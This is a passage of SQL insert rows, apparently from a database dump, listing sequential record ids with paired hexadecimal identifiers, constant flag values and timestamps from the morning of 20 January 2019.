(50344, 'e847a8f5ccd135c2a0a583aa07b0b408', '7078c9f75e6e3b78', 0, 2, 1, '2019-01-20 07:17:10'),
(50345, '4e6e82a2fe4218f25accc0c601e24b3d', 'ea06c3e5d0e2a46b', 0, 2, 1, '2019-01-20 07:17:26'),
(50346, '0c677ae5da8b6d468f0f308932e98966', 'c60f169e4aca5be9', 0, 2, 1, '2019-01-20 07:17:44'),
(50347, '96b0a0fb0b51190011e949c2440934d3', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-20 07:17:47'),
(50348, '8a9cc7e907f790c1d141d35cc0b31c7c', '6e117bd555667400', 0, 2, 1, '2019-01-20 07:18:46'),
(50349, '0d44ed6b21f6cfe0904ac4ab59ff7a57', 'd864c73ed9401631', 0, 2, 1, '2019-01-20 07:19:12'),
(50350, 'ac61f7ecf35aac044725d3c3c3481a2b', '91d21119de46096c', 0, 2, 1, '2019-01-20 07:19:46'),
(50351, '96b0a0fb0b51190011e949c2440934d3', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-20 07:20:06'),
(50352, 'ac61f7ecf35aac044725d3c3c3481a2b', '91d21119de46096c', 0, 2, 1, '2019-01-20 07:20:14'),
(50353, '3fecc65ed5cdee44f4ed1676777c3dbd', '6521fe834dce4d43', 0, 2, 1, '2019-01-20 07:20:33'),
(50354, '3fecc65ed5cdee44f4ed1676777c3dbd', '6521fe834dce4d43', 0, 2, 1, '2019-01-20 07:21:07'),
(50355, '96b0a0fb0b51190011e949c2440934d3', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-20 07:21:13'),
(50356, '96b0a0fb0b51190011e949c2440934d3', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-20 07:21:20'),
(50357, '6abe389496c1c4139e43a9b217f3f6ae', '46713cac27a94b83', 0, 2, 1, '2019-01-20 07:21:21'),
(50358, '0d03ac234685ccc2be6af3eb8a962507', 'e059f0167d284854', 0, 2, 1, '2019-01-20 07:21:21'),
(50359, '6abe389496c1c4139e43a9b217f3f6ae', '46713cac27a94b83', 0, 2, 1, '2019-01-20 07:21:32'),
(50360, '96b0a0fb0b51190011e949c2440934d3', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-20 07:21:48'),
(50361, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 07:23:30'),
(50362, 'c193a1ed1a4a603a070c076ad699d1c8', '83e475d8a3eea7c6', 0, 2, 1, '2019-01-20 07:25:23'),
(50363, 'e8f201a0a6effe4744e632fe9136dd9c', '9b439e4e6dd53e8a', 0, 2, 1, '2019-01-20 07:27:05'),
(50364, 'f2dbeab72e48621e7e0d3162e2d5df4a', '358a3a4d13e5d4e5', 0, 2, 1, '2019-01-20 07:29:46'),
(50365, '07710ef6d912138732133ddb87fc5774', '7360a39100bb76e9', 0, 2, 1, '2019-01-20 07:34:22'),
(50366, '093953866983208e3bc0e82aceeafdff', 'fbf0576065758144', 0, 2, 1, '2019-01-20 07:34:47'),
(50367, '1265ba0c95fd462442828f41a81ffdf6', '34bb99ab0ceb1917', 0, 2, 1, '2019-01-20 07:35:14'),
(50368, '3801551ced3a23881882ad38e12dd92e', '77d63d0a90a92829', 0, 2, 1, '2019-01-20 07:36:53'),
(50369, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-20 07:37:13'),
(50370, '4ded6d635f0b81e55cb5708cad8fae0f', 'f245134a02f5b496', 0, 2, 1, '2019-01-20 07:37:32'),
(50371, '77c73b3d35f23e142b261a32c392787a', '74aba437eea39f30', 0, 2, 1, '2019-01-20 07:37:56'),
(50372, '8b28016e692946f8ec898f95c03505fa', 'ef33699b366746ed', 0, 2, 1, '2019-01-20 07:38:37'),
(50373, 'e119acaf2a273c831abf795953f6489f', '69ff72c9393970bf', 0, 2, 1, '2019-01-20 07:42:17'),
(50374, 'ac61f7ecf35aac044725d3c3c3481a2b', '91d21119de46096c', 0, 2, 1, '2019-01-20 07:46:11'),
(50375, 'ac61f7ecf35aac044725d3c3c3481a2b', '91d21119de46096c', 0, 2, 1, '2019-01-20 07:46:21'),
(50376, '5decd056f0d00bebe5169888dee924d8', '3e96d1f4dac4719f', 0, 2, 1, '2019-01-20 07:47:05'),
(50377, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 07:50:07'),
(50378, 'd3dad58623f2e2b41b1f7bd38f48b1cd', '37c6d85bc2eb625e', 0, 2, 1, '2019-01-20 07:50:42'),
(50379, '9dd84f75ea13dd1f150d09b055b09f79', '53f68319b17ad67b', 0, 2, 1, '2019-01-20 07:51:16'),
(50380, '9dd84f75ea13dd1f150d09b055b09f79', '53f68319b17ad67b', 0, 2, 1, '2019-01-20 07:51:28'),
(50381, 'e85eb3fe1793ee24841df295998ae55f', '0b1466b4de9b8a16', 0, 2, 1, '2019-01-20 07:53:43'),
(50382, '9aa73d9b93ed18f3e9be68af7abd1f0e', '9d7e91466402b84a', 0, 2, 1, '2019-01-20 07:56:21'),
(50383, '5decd056f0d00bebe5169888dee924d8', '3e96d1f4dac4719f', 0, 2, 1, '2019-01-20 07:56:38'),
(50384, '3fecc65ed5cdee44f4ed1676777c3dbd', '6521fe834dce4d43', 0, 2, 1, '2019-01-20 07:57:29'),
(50385, '5af8648df680bf8af6f065d277c14ebb', 'f19010d8a5f137d0', 0, 2, 1, '2019-01-20 07:58:01'),
(50386, '3fecc65ed5cdee44f4ed1676777c3dbd', '6521fe834dce4d43', 0, 2, 1, '2019-01-20 07:59:13'),
(50387, '3fecc65ed5cdee44f4ed1676777c3dbd', '6521fe834dce4d43', 0, 2, 1, '2019-01-20 07:59:25'),
(50388, '57183d7aa9a36bd399b07a39e19751bf', '80d0e70110ede451', 0, 2, 1, '2019-01-20 08:06:39'),
(50389, '57183d7aa9a36bd399b07a39e19751bf', '80d0e70110ede451', 0, 2, 1, '2019-01-20 08:06:50'),
(50390, '23273f4b3512c5e206bffe2444aba178', '2034f09284a4c7ca', 0, 2, 1, '2019-01-20 08:09:17'),
(50391, '20bb426e93384945e0b4e83edf36af6c', '417b807dff7c6249', 0, 2, 1, '2019-01-20 08:09:57'),
(50392, 'e449c95d598127a1a049522b0d8e7091', 'cd739182be9070e6', 0, 2, 1, '2019-01-20 08:11:48'),
(50393, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 08:11:56'),
(50394, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-20 08:12:09'),
(50395, '96b0a0fb0b51190011e949c2440934d3', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-20 08:13:08'),
(50396, '96b0a0fb0b51190011e949c2440934d3', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-20 08:13:23'),
(50397, '9227a2626910be9cff91e372df1c10c6', '99ddf52c8ba9b467', 0, 2, 1, '2019-01-20 08:14:33'),
(50398, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-20 08:15:01'),
(50399, '7871281e948348f71ab830dd49976932', '790fbcccb3362dd5', 0, 2, 1, '2019-01-20 08:16:18'),
(50400, '77c73b3d35f23e142b261a32c392787a', '74aba437eea39f30', 0, 2, 1, '2019-01-20 08:17:16'),
(50401, '7871281e948348f71ab830dd49976932', '790fbcccb3362dd5', 0, 2, 1, '2019-01-20 08:17:16'),
(50402, '16d3f1a96efdb781f416f0e1c2aaf1e0', '6e117bd555667400', 0, 2, 1, '2019-01-20 08:17:18'),
(50403, 'e449c95d598127a1a049522b0d8e7091', 'cd739182be9070e6', 0, 2, 1, '2019-01-20 08:18:02'),
(50404, '9a4a5fff548b8b1b8c225bc95ccd0e51', '854dd24b6beb7284', 0, 2, 1, '2019-01-20 08:18:10'),
(50405, '4f115d293f4522d3a6934f1c8834b9a0', 'cd168e0f318137b7', 0, 2, 1, '2019-01-20 08:19:06'),
(50406, '57183d7aa9a36bd399b07a39e19751bf', '80d0e70110ede451', 0, 2, 1, '2019-01-20 08:20:28'),
(50407, 'a709a499c7076ede8fb8ef8e710a22a8', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-20 08:20:40'),
(50408, '57183d7aa9a36bd399b07a39e19751bf', '80d0e70110ede451', 0, 2, 1, '2019-01-20 08:20:50'),
(50409, 'a709a499c7076ede8fb8ef8e710a22a8', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-20 08:21:05'),
(50410, '8b28016e692946f8ec898f95c03505fa', 'ef33699b366746ed', 0, 2, 1, '2019-01-20 08:23:58'),
(50411, '1a21be32833a87809f592be501097f69', '38037cb31b3b9fc2', 0, 2, 1, '2019-01-20 08:26:41'),
(50412, 'b8f5073f95ab98c4dae94a28cc831067', '5df206b80d405b62', 0, 2, 1, '2019-01-20 08:29:04'),
(50413, 'b8f5073f95ab98c4dae94a28cc831067', '5df206b80d405b62', 0, 2, 1, '2019-01-20 08:29:07'),
(50414, 'a709a499c7076ede8fb8ef8e710a22a8', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-20 08:31:46'),
(50415, '54a7293c3716d99c62a31d7ae7cec336', '2c5d66d5c543d2e0', 0, 2, 1, '2019-01-20 08:32:50'),
(50416, '8b28016e692946f8ec898f95c03505fa', 'ef33699b366746ed', 0, 2, 1, '2019-01-20 08:34:35'),
(50417, '82818838f87109cca6668b37d05f9aaf', 'b301d833ea94d585', 0, 2, 1, '2019-01-20 08:37:52'),
(50418, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 08:38:42'),
(50419, 'a709a499c7076ede8fb8ef8e710a22a8', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-20 08:39:09'),
(50420, '15270b7a89cc519dad953eb25ba49829', '7d3e015101cab243', 0, 2, 1, '2019-01-20 08:40:40'),
(50421, '23273f4b3512c5e206bffe2444aba178', '2034f09284a4c7ca', 0, 2, 1, '2019-01-20 08:41:47'),
(50422, '77c73b3d35f23e142b261a32c392787a', '74aba437eea39f30', 0, 2, 1, '2019-01-20 08:41:49'),
(50423, '92ff450ad4c936b76d236b33b297f984', '7087b7e5f0e89b1d', 0, 2, 1, '2019-01-20 08:44:11'),
(50424, '92ff450ad4c936b76d236b33b297f984', '7087b7e5f0e89b1d', 0, 2, 1, '2019-01-20 08:44:30'),
(50425, '84cd67bca6b3bc6e614d87cbd7c0d59d', 'dc9608460c7401ae', 0, 2, 1, '2019-01-20 08:44:40'),
(50426, '9227a2626910be9cff91e372df1c10c6', '99ddf52c8ba9b467', 0, 2, 1, '2019-01-20 08:45:14'),
(50427, '1b1f8e7d55f2667bfcd9e885ae6b0eef', 'c7d4ce8b0de12339', 0, 2, 1, '2019-01-20 08:45:31'),
(50428, '1b1f8e7d55f2667bfcd9e885ae6b0eef', 'c7d4ce8b0de12339', 0, 2, 1, '2019-01-20 08:45:35'),
(50429, '190f1c07ee3eda6ddbf95fc7a50eb4a3', '9968c5be4a7971a2', 0, 2, 1, '2019-01-20 08:46:24'),
(50430, 'd91d3f31a7d179fe1abed84868655f5f', 'c82195f7827b9487', 0, 2, 1, '2019-01-20 08:47:00'),
(50431, '96b0a0fb0b51190011e949c2440934d3', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-20 08:47:03'),
(50432, 'd7dc96b16b10b403a546762935adc884', '2fa458d0337a4355', 0, 2, 1, '2019-01-20 08:47:43'),
(50433, 'aba8dba1fc192e24aaed3cbb0c10d476', 'd57c6a47a6711062', 0, 2, 1, '2019-01-20 08:48:06'),
(50434, 'd32312a0c4ffc50ef0030b697d718c13', '620a00bd218b158c', 0, 2, 1, '2019-01-20 08:48:50'),
(50435, '9c29b0b3840fbb8f7ff0310c4175104f', '4cfda9df5c8ebf2f', 0, 2, 1, '2019-01-20 08:51:37'),
(50436, '8b61f9c4694010357bd3a51ef52fd6f8', '4cfda9df5c8ebf2f', 0, 2, 1, '2019-01-20 08:51:39'),
(50437, '92ff450ad4c936b76d236b33b297f984', '7087b7e5f0e89b1d', 0, 2, 1, '2019-01-20 08:52:32'),
(50438, '92ff450ad4c936b76d236b33b297f984', '7087b7e5f0e89b1d', 0, 2, 1, '2019-01-20 08:52:40'),
(50439, '92ff450ad4c936b76d236b33b297f984', '7087b7e5f0e89b1d', 0, 2, 1, '2019-01-20 08:52:48'),
(50440, '92ff450ad4c936b76d236b33b297f984', '7087b7e5f0e89b1d', 0, 2, 1, '2019-01-20 08:53:02'),
(50441, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 08:53:18'),
(50442, '8b61f9c4694010357bd3a51ef52fd6f8', '4cfda9df5c8ebf2f', 0, 2, 1, '2019-01-20 08:54:29'),
(50443, '190f1c07ee3eda6ddbf95fc7a50eb4a3', '9968c5be4a7971a2', 0, 2, 1, '2019-01-20 08:55:52'),
(50444, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-20 08:57:36'),
(50445, 'a709a499c7076ede8fb8ef8e710a22a8', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-20 08:58:37'),
(50446, 'a709a499c7076ede8fb8ef8e710a22a8', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-20 09:00:23'),
(50447, '6d2e3cd317d497518f3275da9daa8b08', 'b3fb8540efdab4b7', 0, 2, 1, '2019-01-20 09:01:14'),
(50448, 'a709a499c7076ede8fb8ef8e710a22a8', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-20 09:01:25'),
(50449, 'a78223d8adbd8001cbe9de07ea6b3f8d', '56e7558ad7ddea6b', 0, 2, 1, '2019-01-20 09:01:50'),
(50450, '42ac333a4ec57d5274f59ea7540c068d', '721a08095e6444d9', 0, 2, 1, '2019-01-20 09:02:58'),
(50451, 'a709a499c7076ede8fb8ef8e710a22a8', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-20 09:03:04'),
(50452, '8135794764b3c83973131ee86e952200', '9968c5be4a7971a2', 0, 2, 1, '2019-01-20 09:03:59'),
(50453, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 09:04:05'),
(50454, '84a32430d6a72c8fd7ec74668edaa20c', '19ac418837a1bfb6', 0, 2, 1, '2019-01-20 09:04:17'),
(50455, '03b63e08649a7d0f8e08a0025c639bcd', '082f2d7def20bd83', 0, 2, 1, '2019-01-20 09:06:13'),
(50456, 'e167cff295000dd107eacdba7a962ad1', '6aa61016546038d1', 0, 2, 1, '2019-01-20 09:07:02'),
(50457, '8135794764b3c83973131ee86e952200', '9968c5be4a7971a2', 0, 2, 1, '2019-01-20 09:07:53'),
(50458, '57183d7aa9a36bd399b07a39e19751bf', '80d0e70110ede451', 0, 2, 1, '2019-01-20 09:07:53'),
(50459, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 09:08:08'),
(50460, '57183d7aa9a36bd399b07a39e19751bf', '80d0e70110ede451', 0, 2, 1, '2019-01-20 09:08:18'),
(50461, '271a641a35f26ba737f772f00230b6cb', '113a26d6adf3f967', 0, 2, 1, '2019-01-20 09:08:31'),
(50462, '9e8b741c20d35e55839d81a9a683bfdc', 'bd4e48b5d7054135', 0, 2, 1, '2019-01-20 09:09:16'),
(50463, '9e8b741c20d35e55839d81a9a683bfdc', 'bd4e48b5d7054135', 0, 2, 1, '2019-01-20 09:11:49'),
(50464, '42ac333a4ec57d5274f59ea7540c068d', '721a08095e6444d9', 0, 2, 1, '2019-01-20 09:11:58'),
(50465, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 09:14:22'),
(50466, '8135794764b3c83973131ee86e952200', '9968c5be4a7971a2', 0, 2, 1, '2019-01-20 09:14:41'),
(50467, 'b4ab12b1eb40debb277513380f581845', '069827ca06c91db5', 0, 2, 1, '2019-01-20 09:15:45'),
(50468, '03b63e08649a7d0f8e08a0025c639bcd', '082f2d7def20bd83', 0, 2, 1, '2019-01-20 09:16:31'),
(50469, '2cf640865e774b3bdd84da32da024eea', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-20 09:16:31'),
(50470, 'bf4abd466a1a261c9ef4cb588443de25', '0b3fa1283e0dd19e', 0, 2, 1, '2019-01-20 09:16:56'),
(50471, 'bf4abd466a1a261c9ef4cb588443de25', '0b3fa1283e0dd19e', 0, 2, 1, '2019-01-20 09:16:56'),
(50472, '57183d7aa9a36bd399b07a39e19751bf', '80d0e70110ede451', 0, 2, 1, '2019-01-20 09:17:42'),
(50473, '57183d7aa9a36bd399b07a39e19751bf', '80d0e70110ede451', 0, 2, 1, '2019-01-20 09:18:13'),
(50474, '10d9dd3cc2d4c41766bf0f14d934e7d4', '5ff50e247bff9b98', 0, 2, 1, '2019-01-20 09:19:46'),
(50475, '10d9dd3cc2d4c41766bf0f14d934e7d4', '5ff50e247bff9b98', 0, 2, 1, '2019-01-20 09:20:16'),
(50476, '1887610a75374effed3b142cd6ab64b5', '81813d0a0d1e159b', 0, 2, 1, '2019-01-20 09:20:45'),
(50477, '2cf640865e774b3bdd84da32da024eea', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-20 09:21:22'),
(50478, '45ee01be2691ff4f4fa925dcb4e5b424', '9131cf169f325495', 0, 2, 1, '2019-01-20 09:21:30'),
(50479, '193953c46da5c91ae6a657a355c7ef44', 'b23d12a32f1abe99', 0, 2, 1, '2019-01-20 09:21:42'),
(50480, '2cf640865e774b3bdd84da32da024eea', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-20 09:25:16'),
(50481, '2cf640865e774b3bdd84da32da024eea', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-20 09:25:16'),
(50482, '1fd02032a39c8b4067863f48693ae6ac', '5fdab6772244ebe7', 0, 2, 1, '2019-01-20 09:26:59'),
(50483, '1fd02032a39c8b4067863f48693ae6ac', '5fdab6772244ebe7', 0, 2, 1, '2019-01-20 09:27:22'),
(50484, '1fd02032a39c8b4067863f48693ae6ac', '5fdab6772244ebe7', 0, 2, 1, '2019-01-20 09:27:38'),
(50485, '261963224e1ff8ae25b2ca18c09610bb', 'b22ff80b39fc8736', 0, 2, 1, '2019-01-20 09:28:00'),
(50486, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 09:30:46'),
(50487, '6abe389496c1c4139e43a9b217f3f6ae', '46713cac27a94b83', 0, 2, 1, '2019-01-20 09:33:24'),
(50488, '1887610a75374effed3b142cd6ab64b5', '81813d0a0d1e159b', 0, 2, 1, '2019-01-20 09:33:32'),
(50489, '487bd38bbe938da72a8ef1de1c9fef74', 'f10990f26adcd1c5', 0, 2, 1, '2019-01-20 09:34:56'),
(50490, '559d2c6fcbc1671c96cc360600fcaaa6', '7501b42c35accff7', 0, 2, 1, '2019-01-20 09:35:14'),
(50491, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-20 09:36:06'),
(50492, '2cf640865e774b3bdd84da32da024eea', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-20 09:36:21'),
(50493, '2cf640865e774b3bdd84da32da024eea', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-20 09:36:28'),
(50494, '7fc8db6fb77b483b6e70797180767624', '3967420ae463478a', 0, 2, 1, '2019-01-20 09:39:08'),
(50495, '1916caa03373e589d3e1986eb0f8455b', 'f395658fa05d946b', 0, 2, 1, '2019-01-20 09:41:56'),
(50496, '7b7dc978225caf40212ce60b6094cc44', '5b3051f95f43261f', 0, 2, 1, '2019-01-20 09:42:39'),
(50497, '2cf640865e774b3bdd84da32da024eea', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-20 09:43:55'),
(50498, '2cf640865e774b3bdd84da32da024eea', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-20 09:44:11'),
(50499, '2cf640865e774b3bdd84da32da024eea', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-20 09:44:25'),
(50500, '2cf640865e774b3bdd84da32da024eea', '66cd2ffd1b716f5a', 0, 2, 1, '2019-01-20 09:45:15'),
(50501, 'bd446e61cc55b36c9a4b13e8ea2fbd08', 'fc46b6a557fad646', 0, 2, 1, '2019-01-20 09:45:25'),
(50502, '7b7dc978225caf40212ce60b6094cc44', '5b3051f95f43261f', 0, 2, 1, '2019-01-20 09:45:42'),
(50503, 'f07158a93f348d5baf6c4e715462c62b', 'c6e97f17cebc7ba8', 0, 2, 1, '2019-01-20 09:45:53'),
(50504, 'f07158a93f348d5baf6c4e715462c62b', 'c6e97f17cebc7ba8', 0, 2, 1, '2019-01-20 09:46:29'),
(50505, '0d03ac234685ccc2be6af3eb8a962507', 'e059f0167d284854', 0, 2, 1, '2019-01-20 09:46:30'),
(50506, 'ac61f7ecf35aac044725d3c3c3481a2b', '91d21119de46096c', 0, 2, 1, '2019-01-20 09:49:41'),
(50507, 'ac61f7ecf35aac044725d3c3c3481a2b', '91d21119de46096c', 0, 2, 1, '2019-01-20 09:49:48'),
(50508, '559d2c6fcbc1671c96cc360600fcaaa6', '7501b42c35accff7', 0, 2, 1, '2019-01-20 09:50:09'),
(50509, 'ac61f7ecf35aac044725d3c3c3481a2b', '91d21119de46096c', 0, 2, 1, '2019-01-20 09:50:14'),
(50510, 'ac61f7ecf35aac044725d3c3c3481a2b', '91d21119de46096c', 0, 2, 1, '2019-01-20 09:50:35'),
(50511, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-20 09:50:39'),
(50512, '559d2c6fcbc1671c96cc360600fcaaa6', '7501b42c35accff7', 0, 2, 1, '2019-01-20 09:50:46'),
(50513, '271a641a35f26ba737f772f00230b6cb', '113a26d6adf3f967', 0, 2, 1, '2019-01-20 09:50:48'),
(50514, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-20 09:51:03'),
(50515, '1fd02032a39c8b4067863f48693ae6ac', '5fdab6772244ebe7', 0, 2, 1, '2019-01-20 09:51:05'),
(50516, 'eda9328af11f7bedd23c4715bc1fe5b6', 'c020abbb40884763', 0, 2, 1, '2019-01-20 09:51:10'),
(50517, 'b8f5073f95ab98c4dae94a28cc831067', '5df206b80d405b62', 0, 2, 1, '2019-01-20 09:51:15'),
(50518, 'a30e286fc7d092e4210767b023b6b92b', '332723ec6654d9f5', 0, 2, 1, '2019-01-20 09:51:15'),
(50519, '77c73b3d35f23e142b261a32c392787a', '74aba437eea39f30', 0, 2, 1, '2019-01-20 09:51:16'),
(50520, 'a30e286fc7d092e4210767b023b6b92b', '332723ec6654d9f5', 0, 2, 1, '2019-01-20 09:51:21'),
(50521, '6abe389496c1c4139e43a9b217f3f6ae', '46713cac27a94b83', 0, 2, 1, '2019-01-20 09:51:32'),
(50522, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-20 09:51:34'),
(50523, '77c73b3d35f23e142b261a32c392787a', '74aba437eea39f30', 0, 2, 1, '2019-01-20 09:51:34'),
(50524, 'f1d75768efc713fef36db93453fecea5', '60ed72c979f92224', 0, 2, 1, '2019-01-20 09:51:59'),
(50525, 'd8081b6aa43d58c00871a6228b7afdf1', '811404fa6e6cfa2e', 0, 2, 1, '2019-01-20 09:54:41'),
(50526, 'ccde414a7ba1ba238c540c51e676f3a6', '2212915756384c5c', 0, 2, 1, '2019-01-20 09:57:31'),
(50527, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-20 09:58:24'),
(50528, '77c73b3d35f23e142b261a32c392787a', '74aba437eea39f30', 0, 2, 1, '2019-01-20 09:58:47'),
(50529, '271a641a35f26ba737f772f00230b6cb', '113a26d6adf3f967', 0, 2, 1, '2019-01-20 09:58:57'),
(50530, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-20 09:59:02'),
(50531, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-20 09:59:17'),
(50532, 'a30e286fc7d092e4210767b023b6b92b', '332723ec6654d9f5', 0, 2, 1, '2019-01-20 09:59:19'),
(50533, '77c73b3d35f23e142b261a32c392787a', '74aba437eea39f30', 0, 2, 1, '2019-01-20 09:59:26'),
(50534, 'f1d75768efc713fef36db93453fecea5', '60ed72c979f92224', 0, 2, 1, '2019-01-20 09:59:41'),
(50535, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-20 09:59:46'),
(50536, 'b8f5073f95ab98c4dae94a28cc831067', '5df206b80d405b62', 0, 2, 1, '2019-01-20 10:00:02'),
(50537, '84a32430d6a72c8fd7ec74668edaa20c', '19ac418837a1bfb6', 0, 2, 1, '2019-01-20 10:00:03'),
(50538, 'b970516bb9a5daf6020c8fe8a8315cf4', 'f44ed019343ebf10', 0, 2, 1, '2019-01-20 10:03:42'),
(50539, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 10:04:11'),
(50540, '191a9dd102d016b7f6ac4290aca7c343', 'c4dd2255416826d2', 0, 2, 1, '2019-01-20 10:04:19'),
(50541, '8b28016e692946f8ec898f95c03505fa', 'ef33699b366746ed', 0, 2, 1, '2019-01-20 10:04:48'),
(50542, 'f1d75768efc713fef36db93453fecea5', '60ed72c979f92224', 0, 2, 1, '2019-01-20 10:06:01'),
(50543, 'd3c550a185ac780184cb739afb614cce', 'b4ecb18ba7992a18', 0, 2, 1, '2019-01-20 10:10:53'),
(50544, 'ac61f7ecf35aac044725d3c3c3481a2b', '91d21119de46096c', 0, 2, 1, '2019-01-20 10:14:08'),
(50545, 'ac61f7ecf35aac044725d3c3c3481a2b', '91d21119de46096c', 0, 2, 1, '2019-01-20 10:14:24'),
(50546, 'da4a3dde8c9b9712e9dfce7da119b438', 'fb6a93dd0af9c441', 0, 2, 1, '2019-01-20 10:16:03'),
(50547, 'f1d75768efc713fef36db93453fecea5', '60ed72c979f92224', 0, 2, 1, '2019-01-20 10:19:40'),
(50548, 'd3c550a185ac780184cb739afb614cce', 'b4ecb18ba7992a18', 0, 2, 1, '2019-01-20 10:19:46'),
(50549, '1887610a75374effed3b142cd6ab64b5', '81813d0a0d1e159b', 0, 2, 1, '2019-01-20 10:20:01'),
(50550, 'c943b5b2854fecd15366edffe9ca94f6', '88137eb18f20394f', 0, 2, 1, '2019-01-20 10:20:02'),
(50551, '6abe389496c1c4139e43a9b217f3f6ae', '46713cac27a94b83', 0, 2, 1, '2019-01-20 10:20:09'),
(50552, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 10:20:59'),
(50553, 'c943b5b2854fecd15366edffe9ca94f6', '88137eb18f20394f', 0, 2, 1, '2019-01-20 10:21:09'),
(50554, '81d905fe5cd809e41471ce3cff23ba14', '3a681ce2bd8cc6dd', 0, 2, 1, '2019-01-20 10:21:14'),
(50555, '23273f4b3512c5e206bffe2444aba178', '2034f09284a4c7ca', 0, 2, 1, '2019-01-20 10:21:20'),
(50556, '1887610a75374effed3b142cd6ab64b5', '81813d0a0d1e159b', 0, 2, 1, '2019-01-20 10:21:23'),
(50557, 'b8f5073f95ab98c4dae94a28cc831067', '5df206b80d405b62', 0, 2, 1, '2019-01-20 10:21:31'),
(50558, 'f1d75768efc713fef36db93453fecea5', '60ed72c979f92224', 0, 2, 1, '2019-01-20 10:21:37'),
(50559, '271a641a35f26ba737f772f00230b6cb', '113a26d6adf3f967', 0, 2, 1, '2019-01-20 10:22:30'),
(50560, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-20 10:22:43'),
(50561, '1fd02032a39c8b4067863f48693ae6ac', '5fdab6772244ebe7', 0, 2, 1, '2019-01-20 10:22:44'),
(50562, '1887610a75374effed3b142cd6ab64b5', '81813d0a0d1e159b', 0, 2, 1, '2019-01-20 10:22:57'),
(50563, 'f1d75768efc713fef36db93453fecea5', '60ed72c979f92224', 0, 2, 1, '2019-01-20 10:23:09'),
(50564, '70900010e1b336fc4775909d2b0dc159', '5d5c6e272bdea80c', 0, 2, 1, '2019-01-20 10:23:43'),
(50565, '1fd02032a39c8b4067863f48693ae6ac', '5fdab6772244ebe7', 0, 2, 1, '2019-01-20 10:23:50'),
(50566, 'de5796750cb23c9911710140aee00675', '3888d86689fde238', 0, 2, 1, '2019-01-20 10:24:42'),
(50567, 'df886005b9ab8d48b2c7b84c6b71bdd5', '041ef6b69f86bfee', 0, 2, 1, '2019-01-20 10:24:47'),
(50568, 'df886005b9ab8d48b2c7b84c6b71bdd5', '041ef6b69f86bfee', 0, 2, 1, '2019-01-20 10:24:51'),
(50569, 'f1d75768efc713fef36db93453fecea5', '60ed72c979f92224', 0, 2, 1, '2019-01-20 10:24:54'),
(50570, 'e847a8f5ccd135c2a0a583aa07b0b408', '7078c9f75e6e3b78', 0, 2, 1, '2019-01-20 10:24:59'),
(50571, '78fc564d86733639a5be80b727ad9b9b', '32d7b33c71d23276', 0, 2, 1, '2019-01-20 10:25:07'),
(50572, '1fd02032a39c8b4067863f48693ae6ac', '5fdab6772244ebe7', 0, 2, 1, '2019-01-20 10:25:09'),
(50573, '78fc564d86733639a5be80b727ad9b9b', '32d7b33c71d23276', 0, 2, 1, '2019-01-20 10:25:23'),
(50574, '77c73b3d35f23e142b261a32c392787a', '74aba437eea39f30', 0, 2, 1, '2019-01-20 10:26:25'),
